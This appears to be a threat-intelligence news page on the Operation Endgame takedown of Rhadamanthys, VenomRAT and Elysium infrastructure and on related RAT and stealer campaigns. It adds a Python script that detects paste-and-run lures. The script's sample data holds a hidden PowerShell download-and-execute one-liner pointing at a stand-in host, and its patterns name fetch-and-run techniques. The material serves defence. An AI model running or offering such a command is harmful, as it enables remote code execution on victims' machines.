Operation Endgame Disrupts Rhadamanthys, VenomRAT, and Elysium Malware Operations
International law enforcement agencies, coordinated by Europol and Eurojust, executed a major crackdown on the infrastructures supporting the Rhadamanthys infostealer, VenomRAT remote access trojan, and the Elysium botnet. The operation, part of the ongoing Operation Endgame, resulted in the takedown of over 1,025 servers and the seizure of 20 domains used to control and distribute these malware families. Authorities also arrested the main suspect behind VenomRAT in Greece, and the dismantled infrastructure included hundreds of thousands of infected computers and millions of stolen credentials, with many victims unaware of the compromise. The operation involved law enforcement from at least nine countries and was supported by numerous private sector partners, including cybersecurity firms and threat intelligence organizations.
Rhadamanthys, a modular information stealer sold as malware-as-a-service, and VenomRAT, a commodity RAT favored by threat actors like TA558, were both widely distributed through email campaigns, malvertising, and other vectors. The Elysium botnet, less well-documented, was also linked to these operations, potentially serving as a proxy network for criminal activity. The disruption has caused significant operational issues for cybercriminals, with many reporting loss of access to their command-and-control panels and servers. Authorities have advised potential victims to check if their systems were compromised and to take remediation steps, as the takedown is expected to have a substantial impact on the cybercrime ecosystem.
Related Stories
Law Enforcement Disruption of Major Malware and Ransomware Operations
International law enforcement agencies have intensified efforts to disrupt the infrastructure of prominent malware and ransomware operations. Europol, as part of Operation Endgame, targeted the servers supporting the Rhadamanthys information stealer, resulting in a sudden loss of access for its operators and a halt in observed activity since late October 2025. Rhadamanthys, a C++-based stealer-as-a-service, had been widely distributed through phishing campaigns and malicious ads, with its latest version released in October 2025. The operation's impact on the long-term viability of Rhadamanthys remains to be seen, but the immediate effect has been a significant reduction in its activity. In parallel, law enforcement agencies across the US and Europe have made notable arrests and infrastructure takedowns targeting ransomware groups. The UK’s National Crime Agency apprehended a suspect linked to a ransomware attack that disrupted multiple European airports, while US authorities filed charges against the administrator of several notorious ransomware gangs and seized assets from a Zeppelin ransomware distributor. Additionally, a coordinated international operation dismantled the infrastructure of the BlackSuit ransomware group, further demonstrating the global commitment to combating cybercrime. These actions collectively signal a robust and ongoing crackdown on cybercriminal operations by international authorities.
3 months ago
Multiple malware campaigns using compromised websites and phishing lures to deliver RATs and stealers
Threat actors are using **compromised or spoofed websites** to trick victims into executing malware, with lures ranging from fake browser updates to counterfeit security-software download pages. Recorded Future’s Insikt Group reported that financially motivated **GrayCharlie** (overlapping with **SmartApeSG**) compromised multiple U.S. law-firm WordPress sites—potentially via a shared IT/marketing provider—and injected externally hosted JavaScript that redirected visitors to **bogus update pages** or **fake CAPTCHA** flows. Victims were prompted to run a PowerShell command via the Windows Run dialog, leading to **NetSupport RAT** installation and follow-on delivery of **Stealc** and **SectopRAT**; the operation’s infrastructure was noted as being supported by **MivoCloud** and **HZ Hosting Ltd.** Separately, Malwarebytes-linked reporting described a **typosquatting** campaign impersonating the Huorong antivirus site (`huoronga[.]com` vs. `huorong.cn`) to distribute **ValleyRAT** (built on the **Winos4.0** framework), attributed to the Chinese-speaking **Silver Fox APT**; the payload was routed through an intermediary domain and hosted on **Cloudflare R2**, with a ZIP masquerading as Huorong (`BR火绒445[.]zip`). In a different region and access vector, Group-IB reported Iran-linked **MuddyWater** running **Operation Olalampo** against MENA targets using **phishing emails** with malicious Office documents/macros to deploy new tooling including **GhostFetch** (dropping **GhostBackDoor**) and **CHAR** (a Rust backdoor controlled via a **Telegram bot**), plus variants using **HTTP_VIP** to deploy *AnyDesk*; the campaign also leveraged recently disclosed vulnerabilities on public-facing servers for initial access.
2 weeks ago
Malware campaigns abusing trusted software channels (browser extensions, developer tools, and Google Ads) to deliver RATs and stealers
Multiple active malware campaigns are abusing *trusted distribution channels*—including Chrome/Edge extensions, Visual Studio Code extensions, and Google Ads/redirection infrastructure—to trick users into executing payloads that deliver **remote access trojans (RATs)** or **information stealers**. Huntress reported a malvertising-driven fake ad blocker extension, **NexShield**, that intentionally forces Chrome/Edge into a crash/DoS state by looping `chrome.runtime` port connections; on restart it displays a fake “security warning” and uses a **ClickFix-style** social engineering flow (“CrashFix”) to push users to paste and run clipboard-copied commands that trigger an obfuscated PowerShell download-and-execute chain, ultimately deploying the Python-based **ModeloRAT** in corporate environments. Separately, Trend Micro described **Evelyn Stealer** delivered via a trojanized **Visual Studio Code extension** that drops a malicious `Lightshot.dll` side-loaded by legitimate *Lightshot* (`Lightshot.exe`), then runs staged PowerShell and payload retrieval to steal browser credentials, cookies, crypto wallets, VPN/Wi‑Fi data, files, and screenshots before exfiltrating to an attacker-controlled FTP server—posing elevated risk when developer workstations are compromised. South Korea-focused activity also features prominently across several reports, with multiple delivery vectors leading to RAT deployment. ASEC documented **Remcos RAT** distributed via fake installers masquerading as *VeraCrypt* and via gambling-related “lookup” tools, using multi-stage obfuscated **VBS/PowerShell** chains and enabling credential theft, keylogging, and device surveillance (webcam/mic). 
Genians attributed “**Operation Poseidon**” to the **Konni APT**, describing spear-phishing that abuses Google’s advertising/tracking redirection (e.g., `ad.doubleclick.net` parameters) to make malicious links appear legitimate, redirecting victims to compromised WordPress infrastructure hosting ZIPs with LNK files that launch AutoIt-based loaders to run an **EndRAT** variant in memory. Nextron Systems reported widespread trojanized “free converter” apps promoted via malicious Google ads and lookalike converter sites (e.g., `ez2convertapp[.]com`, `convertyfileapp[.]com`), with some payloads signed using abused/rotating code-signing certificates (e.g., BLUE TAKIN LTD, TAU CENTAURI LTD, SPARROW TIDE LTD) to evade trust checks while installing persistent backdoors.
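The fake-CAPTCHA and "CrashFix" flows described above end with the victim pasting a PowerShell command into the Windows Run dialog, and Explorer records every Run command under the RunMRU registry key. As an added example (not from the page or any vendor's tooling), this Python script triages a constructed `.reg` export of that key for hidden fetch-and-execute one-liners; the indicator weights and the threshold are assumptions chosen for illustration.

```python
# Added example (not from the page or any vendor's tooling): triage Windows
# Run-dialog history for the paste-and-run PowerShell lures described above.
# Explorer records each Run command under HKCU\...\Explorer\RunMRU; the input
# here is a .reg-style export of that key (the sample below is constructed).
import re

# Weighted indicators of a hidden, fetch-and-execute PowerShell one-liner.
INDICATORS = [
    (r"-(?:w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
    (r"-(?:ep|executionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", 2, "web download"),
    (r"\biex\b|invoke-expression", 3, "in-memory execution"),
    (r"\bmshta\b|\bcertutil\b.*-urlcache", 2, "LOLBin fetch"),
    (r"https?://\S+", 1, "remote URL"),
]

def score_command(cmd):
    """Return (score, [indicator names]) for one Run-dialog command line."""
    hits = [(w, name) for pat, w, name in INDICATORS if re.search(pat, cmd, re.I)]
    return sum(w for w, _ in hits), [name for _, name in hits]

def parse_runmru(export_text):
    """Parse a .reg export of RunMRU into (mru_order, {slot: command}).
    Slots look like "a"="<command>\\1"; .reg escapes \\ and " with a backslash."""
    slots, order = {}, ""
    for line in export_text.splitlines():
        m = re.match(r'^"([A-Za-z]+)"="(.*)"\s*$', line.strip())
        if not m:
            continue
        name, data = m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))
        if name == "MRUList":
            order = data            # most recent slot first
        else:
            slots[name] = data.removesuffix("\\1")
    return order, slots

def triage(export_text, threshold=4):
    """Most-recent-first (slot, score, hits, command) tuples at/over threshold."""
    order, slots = parse_runmru(export_text)
    scored = ((s, *score_command(slots[s]), slots[s]) for s in order if s in slots)
    return [t for t in scored if t[1] >= threshold]

SAMPLE_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cba"
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -ep bypass -c \"iex (iwr https://update-check.example/c.txt -UseBasicParsing)\"\\1"
'''
```

Run `triage(SAMPLE_EXPORT)` to get only slot `c` flagged; the same scoring can be pointed at PowerShell ScriptBlock or process-creation logs, which capture the same one-liners after they execute.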
1 month ago